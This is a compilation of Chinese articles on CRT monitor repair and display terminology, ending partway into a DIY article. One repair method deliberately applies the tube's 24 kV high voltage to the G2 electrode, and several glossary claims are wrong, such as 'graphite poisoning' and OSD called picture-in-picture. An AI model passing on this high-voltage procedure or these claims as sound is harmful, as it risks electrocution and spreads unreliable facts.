    屏幕显示模糊是各种显示器常见故障之一，其产生原因主要有三个方面：一是运输过程中或使用中受到震动而使FBT（行输出变压器）的聚焦电位器松动或移位，致使加到CRT中的聚焦电压变化（偏离工厂调试好的最佳电压值），造成屏幕模糊；二是使用环境湿度大，使CRT尾座板上聚焦引脚的放电环（半圆球）产生锈蚀，在CRT刚通电时出现模糊现象；三是CRT管内因制造工艺或CRT锥体玻壳内有杂物而使聚焦（focuse）极与加速极（G2）间产生静电积尘，形成极电阻而使屏幕出现严重的模糊现象。
    怎样根据屏幕模糊的现象来判断是何种原因引起的呢？
    首先从屏幕模糊的程度来看，若模糊现象较轻，仅仅是字符轮廓变粗，而字迹依然能识别，大多属第一种原因所引起；若字符大面积严重模糊，屏幕一片白色光晕，字符已无法辨认且调FBT上的聚焦电位器时屏幕亮度随之变化，则属第三种原因所为；如果CRT刚开机时模糊，随着时间的延长，屏幕字符越来越清晰，这通常为第二种原因所造成。
    弄清了屏幕模糊的原因，如何根据故障现象来排除故障呢？
    对于第一种情况，打开机盖，微调FBT中的聚焦（focuse）电位器即可排除故障。至于尾板上聚焦引脚放电环锈蚀的处理，一般使用无水酒精清洗放电环及尾座上各电极插头和插座，如放电环锈蚀严重时，可更换尾座部件。第三种原因引起的屏幕模糊的处理方法是：取下CRT尾座板，将CRT上高压帽中24KV高压用万用表笔线（最好使用绝缘性能好些的数字万用表）引到CRT聚焦板插座中，打开显示器交流电源，用一接地的表笔线对加速极（G2）插头瞬间放电2～3次（最好将CRT上G2插头用一外加保护套管短线引出来，对引出线进行对地瞬间放电作业）。
    一般经过2～3次放电过程便能使聚焦（focuse）与加速极（G2）两电极之间的尘埃极电阻击穿。恢复原电路后，观察屏幕字符或图文显示的清晰程度，必要时适当调一下FBT上的聚焦电位器就能使模糊故障排除。这种方法人们常称“打Acking法”，操作中因涉及到高电压，应谨慎从事，切记保护人身和设备的安全。
    需要说明的是，上述屏幕显示模糊故障，并不包括那些诸如加速极（G2）电压调整不当，亮度、对比度电位器调节位置不合适等引起的屏幕失调，看上去似乎有一层雾朦朦之感觉的情况在内。对于IBM 2248／G03、Envision／D350等显示器，用橡皮榔头对准CRT屏幕正中部位轻轻击打几次，有五成把握能排除这类显示器的模糊故障，这不失为修理显示器模糊故障捷径之路。


显示器起死回生有术

《一键清理系统垃圾》

显示器起死回生有术

    朋友的一台老显示器，瘫痪在那里已有些时日。真是“试”之无“位”，弃之可惜的“死机”。前些日子是颜色混乱，紫一块，黄一块。打字，阅读文件嘛，还勉强“对付”，可游戏、制图，那真是胡子眉毛一把抓。又过了一些时日，屏幕上下直抖动，帧幅越来越小，行幅左右摆动……荧光屏也闪烁频繁，刺人眼睛。亮度也慢慢地暗了下去。呵，这家伙，彻底罢工啦!

    囊中羞涩的缘故，朋友求助于我。想不到过去无线电爱好者的伎俩，竟也派上用场。挤身于CFAN的行列已四、五年时间了，电脑硬件、软件原理虽弄不太清楚，显示器与电视机的荧光屏道理是可借鉴的吧!只要显示器集成块未坏，它的外围元器件是可动手修复的。

    1.荧光屏不亮，怎样动手修理呢?看来只有先修理亮度了。打开显示器外壳(断电情况下)，将荧光屏下面一排焊有电位器的电路板取下，见到一排焊有六个可变电位器，依次记录每个电位器的阻值。它们是：R01亮度10KΩ，R02对比度50KΩ，R03行幅20KΩ，R04行频10KΩ，R05帧幅100KΩ，R06帧频10KΩ。正好来个对症下药!

    荧光屏不亮：首先测得R01阻值很小，几乎等于零Ω。然后换焊接新的10KΩ电位器(注意：用电烙铁焊接时，一定要用铜丝将烙铁外壳接地，或者在焊接时将烙铁电源拔掉)。开机一试，荧光屏亮了，可是屏幕扭曲闪烁的光栅，怎么也稳定不下来。索性把六个电位器全都换成新的，其实也只不过十几元钱而已。在换R03行幅20KΩ时，因无此规格，所以只简单地将电位器左右焊头对调，这是权宜之计。经过帧、行和亮度对比度的反复调试，显示器的一部分总算脱胎换骨了。不过亮是亮了，一张“白纸”又怎能画出美丽的彩色图画呢?

    2.显示器被磁化。显示器被有强磁场的东西所磁化，如未经磁屏蔽的低音喇叭等，只要不是显示器内消磁器烧坏，可以用粗铜丝做成短路环，在显示器外围前后来回移动几次，每次可见色斑减小，直到色斑完全清除掉。

    如果以上办法不能奏效，有可能是消磁器烧坏，出现故障。打开显示器外壳(断电情况下)，在显示器尾管处的电路块上，有一1.7×1.3×2.0厘米的分立元件，型号：MZ72－D，L27RM270。用万用电表欧姆档测一下，只要有任两脚断开，即是烧坏了，换上新的即可恢复正常，最好按原显示器的型号。

    3.聚焦失调。朋友急不可待地上机操作，失望地说：“字迹笔划模糊不清，图片成糊画了。”别着急，这是聚焦失调所致。打开原显示器外壳(当心!行输出变压器输出高压达一两万伏，危险!小心操作)。

    在显示器底板后面，看到聚焦电位器，是无旋转柄的，要用无磁性起刀(不锈铜或者用塑料棒，筷子削成)边仔细调谐，边从镜子反射的荧光屏上观察聚焦效果，直到字迹清晰满意为止。

    实际上这台显示器电器性能很不错，只是被一些外围分立元器件所牵连罢了。好在这台显示器没有高压打火现象，修理到此结束。各位CFAN们，围绕外围分立元器件“做文章”，是大有作为的，可救活一大批瘫痪的显示器，使它们物尽其用。


显示器术语(二)

《一键清理系统垃圾》

显示器术语(二)

白平衡：衡量彩显中红绿蓝（R.G.B）三原色混合生成白色的精确程度的指标。 荫罩:是显像管的造色机构，是安装在荧光屏内侧的上面刻有40多万个孔的薄钢板。荫罩孔的作用在于保证三个电子共同穿过同一个荫罩孔，准确地激发荧光粉，使之发出红、绿、蓝三色光,见图2。而荫罩可分为孔状荫罩和条栅状荫罩两种类型。 孔状荫罩：电子枪发出的电子束通过其上的小孔按一定分布射到屏幕上的荧光点上，从而形成画面。小孔排列越紧密，其显示分辨率就越大。

栅状荫罩：特丽珑或钻石珑所提供的条状遮罩。相对于传统的孔状荫罩，它可以提供更高的亮度和较鲜艳的色彩。

偏转线圈：位于显象管内部。通电后可产生较强的磁场，控制经过加速的电子束的飞行方向。 数控调节：用数码的形式对显示器的各项参数（如亮度、对比度、色温等）进行调节控制，使调节功能更完备，更直观。 菜单调节（OSD）：将显示器的调节功能用图形和数码的形式显示在屏幕上，简化了使用者的操作，并且可以存储调试结果，减少了重复操作。

同屏显示(DD):是OSD的二代，为三星显示器专有。DD将显示器的显示效果和过程都直观地显示在屏幕上，用户只需触动屏幕下方的按键便可调节多种画面设置，所有调节都可存储。

超黑距阵屏幕:是一种利用碳喷涂于屏幕荧光磷点之间，以改善对比度的方法。这种屏幕比一般屏幕暗得多，屏幕影像抗外界光线干扰能力大大增强，图像更为亮丽。目前名牌厂家的显像管基本上都采用了这一技术超清晰。

数码式调节按调节界面： 根据操作界面的不同，数控可分为普通数字调节和OSD（On Screen Display，画中画）两种。其中OSD可以直接在屏幕中显示功能选项和调节状态，因此操作更为直观，调节精度也更高。OSD方式已为越来越多显示器所采用。

CRT涂层:屏幕在使用时会因电子撞击荧光屏及外界光源影响而产生静电、闪烁、反光等干扰。这不仅使图像变得模糊，更为严重的是直接危害到使用者的视力健康。因此CRT表面均应附着有涂层，以减少损害程度。目前主要应用的涂层有如下几种：表面蚀刻屏幕涂层,ARAS涂层,Ultra－ClearCoating.

表面蚀刻屏幕涂层(DirectEtchingCoating)：直接蚀刻CRT表层，使表面产生微小凹凸，以减低外界光源反射干扰。 AGAS(Anti－Glare、Anti－Static)涂层：抗强光、防静电涂层。涂层材料是一种矽涂料，可扩散反射光，减低强光干扰，含有导电微粒。

ARAS(Anti－Reflection、Anti－Static)涂层：防反射、防静电涂层。涂层材料是含一个多层结构的透明电介质涂料，可有效抑制外界光线的反射现象且不会扩散反射光，画面清晰度较好。

Ultra－ClearCoating：超清晰涂层。这是三星显示器特有的一种透明多薄膜复合涂层。它不但大幅度地吸收并降低反射光的干扰，而且减少了图像投射光线的变形，大大增强了图像对比度和艳丽度，且机械强度较佳。它与三星显示器先进的动态聚焦系统、铁镍合金Shadow荫罩(INVARShadowMask)、超黑底屏幕相结合，可以达到最佳的图像清晰度和色彩。其它技术指标。如色温(9300°K/6500°K/5000°K)、同步输入信号(分离、复合同步、绿枪同步)等等。这些技术指标对普通用户意义不大，限于篇幅，就不再介

BNC接头：有别于普通15针D－SUB标准接头的特殊显示器接口。由R.G.B三原色信号及行同步、场同步五个独立信号接头组成。主要用于连接工作站等对扫描频率要求很高的系统。BNC接头可以隔绝视频输入信号，使信号相互间干扰减少，且信号频宽较普通D－SUB大，可达到最佳信号响应效果。

显示数据通道(DDC)：是一种在主机和显示器之间建立通信的信息通道。支持微软即插即用功能，可充分发挥显示器的显示能力。

DDC1：VESA组织发布的显示器向主机通信的数据连接标准，规定传送数据格式。

DDC2B：基于I2C总线，允许主机读取显示器扩展显示信息的双向交换的数据通道。

DDC2B＋：基于I2C总线，允许主机和显示器信息进行双向交换的数据通道，可由主机对显示器发送显示控制命令和代码。

DDC2AB：基于ACCESS总线，遥控显示器的双向数据通道。通信带宽更大，并可连接其他外设(如鼠标器)。 动态聚焦：指电子枪扫描屏幕时，对电子束在屏幕中心和四角聚焦上的差异进行自动补偿的功能。普通的电子枪聚焦时会有散光现象，即在边角时像素点垂直方向和水平方向的焦距长度不同，散光现象在屏幕四角最为明显。为减少这种情况的发生，需要对电子枪做动态的补偿，使屏幕上任何扫描点均能清晰一致。动态聚焦技术是采用一个调节器，周期性产生特殊波形的聚焦电压，使电子束在中心点时电压最低，在边角扫描时电压随焦距增大而逐渐增高，动态地补偿聚焦变化，这样可获得近乎完善的清晰画面

电磁幅射标准：指限制显示器所发出的电磁幅射量的国际标准。目前有两项重要的标准是由下列两个瑞典权威机构所定出来的规则：MPR-II，原先是一项由瑞典劳工部所提出的标准，制定了显示器所放出的电磁幅射量的最高范围，现在已被采用为世界标准。TCO，瑞典TCO组织于1991年制定了一个比MPR-II更严格的标准，特别是为交流电场（AEF）而定。

EPA又称为“能源之星”规范：是一个节能的标准。支持这一标准的显示器能有效地节约电力，提供各种节能状态。此标准已经成为显示器的国际标准，普通显示器都应该支持。

MPR-Ⅱ：是一个电磁辐射程度的规范，同样已成为国际标准。符合此标准的显示器可称为“超低辐射”，对人体的伤害大大减小。选择显示器时应注意此功能是否支持。

TCO：是一个瑞典的环保组织，它也提供显示器的安全认证。TCO认证的监测范围最广，包括:环保、低辐射、人体工程学、节能等等。其要求最苛刻，是逐台监测的。TCO的认证分为:TCO92、TCO95、TCO99，是按制定的年份来命名的，当然是一个比一个严格。 TCO95是目前最多见的TCO认证，而通过TCO99的显示器就很少了。而且要进行TCO认证需要许多工序，因此会提高显示器的成本。一般通过此认证的显示器要增加近300元的价格。许多显示器为了保证价格，将一部分产品提供监测，另一部分不监测。然后在零售时将TCO认证作为可选，需要的话价钱就要提高。当然追求高品质的人还是会对产品提出更严格的要求的。不过要注意，TCO认证虽然非常苛刻，但它与显示器的画面质量无关，有些通过TCO认证的显示器画面质量也很差。

TCO的环保要求：电脑中多达30%的塑料包装可能有含溴阻燃剂。这些材料和另一类环境毒素PCB有关，怀疑可能对哺乳动物的生殖能力有损害。石墨可以在显示屏、显像管和电容中找到。它损害神经系统并且较高剂量可以导致石墨中毒。镉在可充电电池和某些电脑显示器的色彩显象层中存在。镉损害神经系统，高剂量时有毒。

TCO92：是由瑞典TCO组织于1991年制定的一个比MPR-II更为严格的标准，增加了对交流电场（ATF）的限制，是目前世界上最为严格的低辐射标准。

TCO95：最新的综合性环保及人体工学设计规范，包括一系列标准和功能：基于TCO 92\ISO\MPR-II；人体工学(ISO 9241)和安全性(IEC 950)标准；电源控制标准(NUTEK)；低电磁辐射\低磁场辐射标准。

TCO-99：TCO99是继TCO95、TCO92之后所发表的规范，TCO92安全规范是在1992年由瑞典TCO所发表，随后又在此基础上制定了TCO95，而TCO99则是瑞典组织于1999年在TCO95基础上制定的更加严格的安全辐射标准，对用户而言，在相同的亮度、对比度下，辐射会更低。TCO99规范的范围相当广泛，包含环境保护、人体工程学、使用便 利性、能源消耗、电力特性、防火电磁与电场辐射性的相关规定。

即插即用: 早期的显示卡安装时必须自己安装驱动程序，设定相关功能及显示器工作范围搭配等问题，安装过程费时费力。如果安装者没有一些基本的电脑知识，想要发挥显卡的大部分功能就很难了。DDC 界面的好处是让我们设置上述相关功能时更简便。开机前只要将支持DDC的显卡和显示器连接好，开机后 Windows 95/98就可以通过DDC 自动侦测并安装所有的驱动程序并进行优化，完成后使用者就可以直接使用，而无需管其他事，这就是“即插即用”。如果中途更换显示器也没关系，只要将显示器与显卡连接好，执行[控制面板]中的[添加新硬件]下的[添加新硬件向导]即可。 特别提到一点，微软公司每年都搜集各类硬件厂商所注册的INF (EDID)文件，整理后放入新版 Windows 95/98 CD内。这样就可免除众多使用者寻找保管驱动程序的麻烦。

闪烁：(Flicker)指画面强度出现的极快速偏差现象。造成的原因是电子束将一个画面扫描到萤幕上得花一些时间所致。有两种闪烁的现象会发生：一是线条闪烁，二是平面闪烁。前者是因为电子束扫描进画面的每一条线而引起，后者是因为平面重复比率达每秒50个所致。

细颈显示管：是指一种比标准电子管颈细的CRT。主要用于15英寸显示器。标准管直径达29mm，细颈管只有22.5mm。由于管颈细、电子束控制方便、聚焦精确，且体积减小，发热减少，能耗可降低15％左右 红门资讯制作中心 LCD的显示视频数字接口标准：

P&D Digital Plug-and-Display (P&D) 标准：是视频电子标准委员会（VESA）制定的，但是，在1997年该标准发布的时候已经和当时的实际情况大大脱节。比如在P&D标准中定义的显示信号接口是一个多功能的接口，能够同时传送数字信号和模拟信号，但是这一点毫无意义，额外的USB和IEEE 1394接口除了会大大增加成本，而且对于显示信号的传送是画蛇添足，也没有哪个显示卡制造商愿意在自己的产品上添加这样昂贵而无用的接口。也正是因为VESA迟迟拿不出象样标准的失误，很多公司都各自联合伙伴推出各自的标准，使得数字接口标准的现况如此混乱。

DFP - Digital Flat Panel Group DFP - Digital Flat Panel Group 标准：是Compaq公司提出的一个行业标准，20针的DFP接口可以支持最高1280X1024分辨率。 支持DFP标准的大公司还有加拿大的ATI，该公司生产出了第一块具有DFP接口的显卡。后来VESA也将DFP接口选做P&D标准的过渡，实际上只要将两种接口标准的功能定义做一个比较就会发现两者并没有什么大的差别。在电气性能的定义上，两者是完全一致的，DFP标准屏除了原来P&D接口标准中那些昂贵而不实用的选件，比如USB，IEEE1394等等，所以DFP标准在施行的时候要便宜得多。但是DFP标准只支持到1280x1024的分辨率。 目前，采用DFP标准接口的显卡有ATI's Rage Pro LT, Voodoo 3's 3500 和Number Nine's SR9 。但是分辨率不足的先天缺陷使得DFP接口不可能太长久。

DVI - Digital Visual Interface DVI - Digital Visual Interface 接口：可以传送数字信号和模拟信号，并且实现的分辨率也可以高得多。这一标准由Digital Display Working Group (DDWG)提出，支持DVI标准的公司有很多也是原来DFP标准的支持者，随后VESA也接受了DVI标准。从技术发展角度来看，DVI接口的前途一片光明，因为它可以支持1280x1024以上的分辨率，而且同时也可以传输模拟的视频信号，这样CRT显示器也可以应用在DVI接口上。

色彩控制：针对排版印刷应用而设计的全新影像色彩调控功能，为用户提供可自行设定的色彩环境。可分别对R、G、B三原色的色饱和度及画面的颜色一致性进行调节修正，用以匹配高档彩色打印输出，能达到所见即所得的效果。

CRT：它是一根真空管，里面有一个或多个电子枪，电子枪射出电子束，电子束射到真空管前表面的内侧时，前表面内侧上的发光涂料受到电子束的击打而发光。

LCD：所谓液晶，是在常温下呈液态，并且光学性质近似于晶体的一大类物质的统称，于19世纪末被奥地利的一位植物学家发现。液晶的分子排列对外界的环境变化（如温度、电磁场的变化）十分敏感。当液晶的分子排列发生变化时，其光学性质也随之改变。利用液晶的这一特点，本世纪60年代英国的科学家制造出了第一块LCD。）

PDP：　除了两块玻璃之间夹着的不是液晶而是一层气体以外，等离子体显示屏的工作方式类似于有源阵列LCD技术。它把气体和电流结合起来激发象素，虽然分辨率稍低，但是图象明亮且成本较有源阵列LCD低，适合商业演示使用。

调节范围：为了适应不同放置地点以及不同人的需要，最好显示器可以作向上20度、向下5度以及垂直方向上约150毫米的调整。

可视角度: 是专指LCD的，所谓“可视角度”是指站在始于屏幕法线的某个角度的位置时仍可清晰看见萤幕图像所构成的最大角度。当然了，可视角是愈大愈好。通常，LCD的可视角度都是左右对称，但上下可就不一定了。而且常常是上下角度小於左右角度。由于每个人的视力不同；因此我们以对比度为准。在最大可视角时所量到的对比愈大愈好。

电子枪：显示器的中心处就是电子枪，位于CRT的最底端。从本质上讲，电子枪不过是体积更大、功率更大的二极管。电子在电子枪那儿获得动能，电子到达CRT前表面内侧时撞击萤光粉（磷质）而失去动能，萤光粉受到撞击而发光、发热，这是一个动能向光能、热能的转换过程。

偏转线圈：从电子枪射出的电子束是直线发射的，显示器要成像，电子束必须连续不断地从左到右、从上到下地向DRT前面板发射电子束，那么电子束怎样才能改变发射方向呢？这就需要用到偏转线圈。它能产生强大的、不断变化的磁场，电子束通过该磁场时发生偏转；磁场方向不断变化，电子束就能连续不断地对荧光屏进行扫描。


显示器术语(一)

《一键清理系统垃圾》

显示器术语(一)

点距：指显示屏上相邻的两个象素点之间的距离(即相邻的同基色点之间的中心距离)在显示屏幕大小一定的前提下，点距越小，则屏幕上的象素排列越紧密，图象就越清晰细腻。用显示区域的宽和高分别除以点距，即得到显示器在垂直和水平方向最高可以显示的点数。以14寸，0.28mm点距显示器为例，它在水平方向最多可以显示1024个点，在竖直方向最多可显示768个点，因此极限分辩率为1024*768。超过这个模式，屏幕上的相邻象素会互相干扰，反而使图象变动模糊不清。目前点距主要有0.39，0.31，0.28，0.26，0.24，0.22mm等几种规格，最小的可达0.20mm。一般来讲，小点距和良好的汇聚性能相结合，才能达到更好的显示效果。（单位：mm）——老点的点距可以达到纳米级别

点状点距,条状点距,柱状点距：一个显示器的点距是.25的Trinitron显像管，而另一个是.28的平面直角显像管，那么有许多人可能会认为一定是Sony的.25的Trinitron显像管的图像是会更清晰吧，那当然，点距越小的不就是越清晰吗？ 那你就错了，点距指的是两点‘同色发光荧光体’之中心点间的直线距离，并且越小就越能得到更精细的画面。但因使用的技术不同，点状点距与条状点距与柱状点距是无法精确地比较的。若粗略地计算，0.25mm的柱状点距约只等于0.27mm的点状点距。也就是说，0.26的点状点距的显像管会是比0.25mm的Trinitron/DiamondTron显像管的解析力要强。那么为什么还要采用0.25mmTrinitron/DiamondTron的显像管呢？这是因为它们的对比度很强，显示出来的画面更加鲜艳，夺目，很适合高端的应用。

栅距：由于SONY推出的特丽珑显象管采用了栅状荫罩，因此引入了栅距的概念。它指的是显象管相邻线条之间的距离，此时电子枪对显象管屏幕的扫描是以线条为象素单位的。（单位：mm）

分辨率：（Resalution）构成一个影象的象素总和，一般用水平象素个数x垂直象素个数来表示。分辨率越高，图象就越清晰，但所得的图象或文字越小。它和刷新频率的关系比较密切，刷新频率为85Hz时分辨率越高，则显示器的性能也越好。可以把分辨率划分为CGA，EGA，VGA，SVGA等几种；按照水平和垂直象素数目来区分，则可以分:320x200，640x480，800x600，1024x768，1280x1024，1600x1280等几种。

刷新频率：刷新频率分为垂直刷新率和水平刷新率，垂直刷新率表示屏幕的图象每秒种重绘多少次。也就是指每秒钟屏幕刷新的次数，以Hz（赫兹）为单位。VESA组织于97年规定85Hz逐行扫描为无闪烁的标准场频水平刷新率，水平刷新率又称行频，它表示显示器从左到右绘制一条水平线所用的时间，以kHz为单位。水平和垂直刷新率及分辨率三者是相关的，所以只要知道了显示器及显卡能够提供的最高垂直刷新率，就可以算出水平刷新率的数值。所以一般提到的刷新率通常指垂直刷新率。刷新率的高低对保护眼睛很重要，当刷新率低于60Hz的时候，屏幕会有明显的抖动，而一般要到72Hz以上才能较好的保护你的眼睛。值得一提的是，一般厂商在广告中宣称的最高刷新频率指的其实是最低分辨率下的情况。

场频：频指垂直扫描速度（Vertical Scan Rate），即刷新频率，一般在60-100Hz左右 场频也叫屏幕刷新频率，指屏幕在每秒钟内更新的次数。人眼睛的视觉暂留约为每秒16-24次左右，因此只要以每秒30次或更短的时间间隔来更新屏幕画面，就可以骗过人的眼睛，让我们以为画面没有变过。虽然如此，实际上每秒30次的屏幕刷新率所产生的闪烁现象我们的眼睛仍然能够察觉从而产生疲劳的感觉。所以屏幕的场频越高，画面越稳定，使用者越感觉舒适。 一般屏幕刷新率场频在每秒75次以上人眼就完全觉察不到了，所以建议场频设定在75Hz-85Hz之间，这足以满足一般使用者的需求了。

行频：即水平扫描频率，指显示器所能达到的每秒内对水平偏转信号的刷新次数，也就是指显像管电子枪在每秒钟内根据水平信号对显示屏进行扫描的次数。如50KHz表示每秒钟显像管电子枪在屏幕上写50千行点。普通14寸彩色显示器的水平扫描频率通常从35.5KHz到66KHz不等，而较好的大屏幕彩色显示器则可达到120KHz的水平（单位：KHz）

扫描频率：指显示器的屏幕在一秒钟之内可以进行多少次全画面扫描。其值越高，画面越稳定。

隔行扫描：(Interlaced)该技术最先由IBM在其8514A显示器上推出，其原理是在对显示屏进行扫描时，先扫描奇数行，再扫描偶数行，扫描两遍的结果才组成一幅完整的图象。这种扫描方式容易实现，成本较低，但是在分辨率达到800×600或更高时，这种扫描方式下的图象会有很大的闪烁感，容易使操作者眼睛疲劳。一般大屏幕彩色显示器都不采用这种扫描方式。

逐行／隔行显示：显示管的电子枪扫描可分为隔行（Interlace）和逐行（non- Interlace）两种。逐行显示是顺序显示每一行。隔行是指每隔一行显示一行到底后再返回显隔行示刚才未显示的行，显示器在低分辨率下其实也是逐行显示的，只有在分辨率增高到一定程度才改为隔行显示。在相同的刷新频率下，隔行显示的图像会比逐行显示闪烁和抖动的更为厉害。不过如今生产的显示器几乎已没有隔行的了。

逐行扫描：(Non-Interlaced)逐行扫描针对隔行扫描方式的缺陷，后来又推出了逐行扫描方式，这种方式是按顺序(不跳行)地扫描输出，一次扫描完毕就组成一幅图象。显示画面没有闪烁的感觉，因此更适合高分辨率下使用，但是对显示器的扫描频率和视频率带宽也提出了较高的要求。很明显，扫描率越高，刷新速度越快，显示就越稳定。现在所有的大屏幕彩显都采用的是逐行扫描方式。

过扫描：是一种新颖的显示器控制功能，在实际显示画面以外的区域也加载有视频扫描信号，只需按动一下按键，即可使画面显示区域方便地增大到全屏，扩展用户的视野。这一功能要求显示器具备更高的带宽和扫描频率。

显示器调整功能：一般的屏幕调整功能，应该包括亮度、对比度、垂直位置、垂直显示尺寸、水平位置、水平显示尺寸等。另外一像5GT的高阶产品更是有消磁、针垫型失真修正、平行四边型失真修正、魔纹失真修正及色温调教功能。对于高端的图形应用而言，这些功能都是极其需要的。 为了减少按钮，增加使用者的方便性，许多厂商开发了专属的画面调控功能，即为一般所谓的OSD（On-screen Display）视控功能。它将原本是一颗颗按键的所有或部分调整功能，整合到一个画面的选单，以图示的方式让使用者更轻易地了解操作方式，5GT更有语言选择功能，可惜只有英语、法语等，但就是没有中文．

调节方式：调节方式从早期的模拟式到现在的数码式调节可以说是越来越方便，功能也越来越强大了。数码式调节与模拟式调节相比，对图像的控制更加精确，操作更加简便，界面也友好得多。另外可以让你存储多个应用程序的屏幕参数也是十分体贴用户的设计。因此它已经取代了模拟式调节而成为调节方式的主流。数码式调节按调节界面分主要有三种：普通数码式、屏幕菜单式和飞梭单键式。各有特色，用户可根据自己的喜好来选择，了解了以上几项基本的指标后，我想各位对如何选择显示器大致有个底了。再看看厂商的产品说明书就可以简单比较比较了。但买显示器光靠枯燥的数据对比肯定不行，主观的感受更加重要。

像素：显示器一般采用光栅扫描方式，即电子束从左向右，自上向下作水平扫描和垂直扫描，电子束撞击显示屏上的众多的荧光粉点而使其发光，每个发光点就是一个像素。分辨率是指屏幕上有多少个象素点，分辨率越高，屏幕上的像素越多，图像也就越清晰。在最高分辨率下，一个发光点对应一个像素。如果设置低于最高分辨率则一个像素可能覆盖多个发光点。 电子枪：位于显象管内部，处于工作状态时不断射出电子束，激发屏幕上的磷光点发光的装置。

显示器的带宽：所谓带宽是显示器视频放大器通频带宽度的简称，一个电路的带宽实际上是反映该电路对输入信号的响应速度。带宽越宽，惯性越小，响应速度越快，允许通过的信号频率越高，信号失真越小，它反映了显示器的解像能力。以MHz(兆赫兹)为单位，它比行频更具综合性。从表面上看，只需用行频乘以水平分辨率就可以得到带宽。但实际上，电子枪在扫描时扫过水平方向上的像素点数与垂直方向上的像素点数均高于理论值，这样才能避免信号在扫描边缘衰减，使图像四周同样清晰。水平分辨率大约为实际扫描值的80％，垂直分辨率大约为实际扫描值的93％，所以带宽的计算公式为：带宽=水平分辨率/0.8×垂直分辨率/0.93×场频。或带宽=水平分辨率×垂直分辨率×场频×1.344。例如：在1024×768@85Hz的模式下，带宽为1024×768×85×1.344=89.84199868MHz。 带宽的值越大，显示器性能越好。

屏幕可视区域：指的是我们可以看到的屏幕，平常说的17寸、15寸实际上指显像管的尺寸,一般可通过量取屏幕左下角到右上角的距离得到。由于显像管都是安装在塑胶外壳内，且由于屏幕的四个边都有黑框无法显示，因此许多人量显示器屏幕的对角线时，根本没有厂家所说的那种尺寸，所以就算是最好的显示器也不能做到可视面积等于显像管面积，只能尽量做到接近与显像管面积，这是评定一个显示器好坏的标准之一，相同的显像管，不同的公司的产品，它的可视面积就不一定会一样，所以我们在购买显示器时要注意尽量买可视面积最接近于显像管面积的显示器．一般14寸的显示器可视范围往往只有12寸；15英寸显示器的可视面积在13.6英英寸到14.2英寸之间，而17英寸显示器的可视面积在15.6英寸到16.2英寸之间。

特丽珑：(trinitron)它是SONY公司的一种独特的显象管技术，采用栅状遮罩，及单枪三束专利技术，能产生比较亮丽、鲜艳的画质。

钻石珑：（diamondtron）三菱公司研制的显象管技术，继承了特丽珑的优点，采用超纯黑屏幕和四倍动态聚焦电子枪，画质出众。

DYNAFLAT：平面显示器有两种形式，即物理平和光学平。由三星公司开发出的DYNAFLAT（动态平面）技术。它使用的显示器外厚玻璃的外表面是纯平的，但没有使用纯平的内表面，而是使用了球面（向用户方向略微突出），它的曲率是根据SNELL公式计算出来的。其原因就在于经过这样的处理后，内面发光点射出的光再经过厚玻璃的折射后进入人眼成像，光路反向沿长线形成的虚光点组成的图像则是真正的平面。简单地说DYNAFLAT技术就是利用非物理平面的厚玻璃（略微突出）的内表面制造出光学平面的图像。

物理平：是指从物理上的各个表面都是纯平面，特别是显示器最外面的一层厚玻璃的内外两面从物理上看都是绝对平面，但这种绝对平面反而造成用户在面对显示器的时候看到的不是平面图像，而是略有些凹陷。其原因就在于如果把人眼看成是屏幕前的两个点，越大屏幕的显示器从边缘部分发的光经过厚厚的玻璃折射后进入人眼成像，由于人眼对折射的不敏感性，光路返回后在实际发光点前形成一个虚拟的发光点，即人眼误以为虚拟的发光点是真正的发光点。这种情况在显示器的中心部位还不太严重，但越到屏幕边缘虚点和实际发光点相差越大，具体来讲就是虚点越靠前，就如同人眼看插在玻璃杯里的筷子是折断的一样。把这些虚点连起来就会发现整个图像向内（远离用户方向）凹陷。所以说物理平并不一定就恰好能产生出纯平的图像。

CRT显像管(CathodeTube阴极射线管)：主要由电子枪、偏转线圈、荫罩、荧光粉层（Phosphor）和玻璃外壳五大部分组成，其原理是利用显像管内的电子枪，将光束射出，穿过荫罩上的小孔，打在一个内层玻璃涂满了无数三原色的荧光粉层上，电子束会使得这些荧光粉发光，最终就形成了你所看到的画面了。而CRT尺寸就是显像管实际尺寸，也是通常所说的显示器尺寸,其单位为英寸(1英寸=25.4mm）

球面显象管：显象管在水平和垂直方向上是曲面。它的制造工艺较成熟，价格较低，但图象显示失真，实际显示面积较小，反光现象严重。 柱面显象管：采用垂直栅条设计，显象管在垂直方向完全笔直，水平方向略有弧度。光透性好，图象更清晰 平面直角显象管：屏幕弯曲更小，更接近“平面”，增强了画面的真实感，这种显象管的屏幕反光较小 色温：描述光源色彩的参数。光源发光时产生一组光谱，用纯黑色产生同样的光谱所需达到的温度既为该光源的色温。

柱面显像管：主要是以SONY的Trinitron（特丽珑）和三菱的DiamondTron（钻石珑）它的表面就好像是一个罐头的侧面，左右有弧度但上下没有，具有防止上下画面扭曲及反光的作用。

阻尼线(有人叫防伪线):Trinitron显像管的一个最大的特征是在显视屏上会有15吋一条，17吋有两条的不很明显的黑线，它的名称叫做阻尼线，是用来将阴罩挂定的，可能会造成在应用中有点影响。

平面直角显像管：平面直角显像管是指整个直角和“近似”平面的显示屏。它对于反光以及画面的变形的免疫力最高。

聚焦性能：指显象管中电子枪发射电子束后通过其调节功能而显示出清晰图象的能力，反映出对电子束扫描偏差的纠错能力。 汇聚性能：红绿蓝（R.G.B）三原色电子束在屏幕中的正确聚焦能力，反映出显象管偏转线圈产生的电磁场对电子束运行轨迹的控制能力。

内部涂层：厂家生产显象管时在荧光粉背面涂上反射层以提高发光效率，同时降低象素间的串色，是显象管的重大技术差别之一。 外部镀膜：显象管的外部镀膜，可阻挡有害射线、消除静电、降低屏幕反光。不同厂家的镀膜材料和技术各不相同。


显示器维护之DIY

《一键清理系统垃圾》

显示器维护之DIY

前言
    如果你自认为是一名DIYer， 相信你对电脑主机的拆装和维护都是“随手捏来都柔软”（舒洁？）。但是当你在一个菜鸟面前大谈Geforce 2 GTS，SB Live! Platinum的时候，你有没有想过怎样才是真正的DIYer？如果你现在开始意识到自己还不是一个真正的老鸟的话，那本文将带领你去真正的DIY一次。
    一、高分辨率的调整
    一台兼容机的14寸VAST SVGA，当分辨率设置为800X600时，在DOS和windows下花屏，只能在640X480的分辨下使用。但在640X480分辨率下运行CAD和Quake3等软件时，显示的字体及图形极为粗糙，可操作的实际屏幕空间窄小，与分辨率为800X600的精致细腻的显示屏幕真实天壤之别，天哪，这台机器配的竟是TNT 2 Ultra（有人倒下吗？）
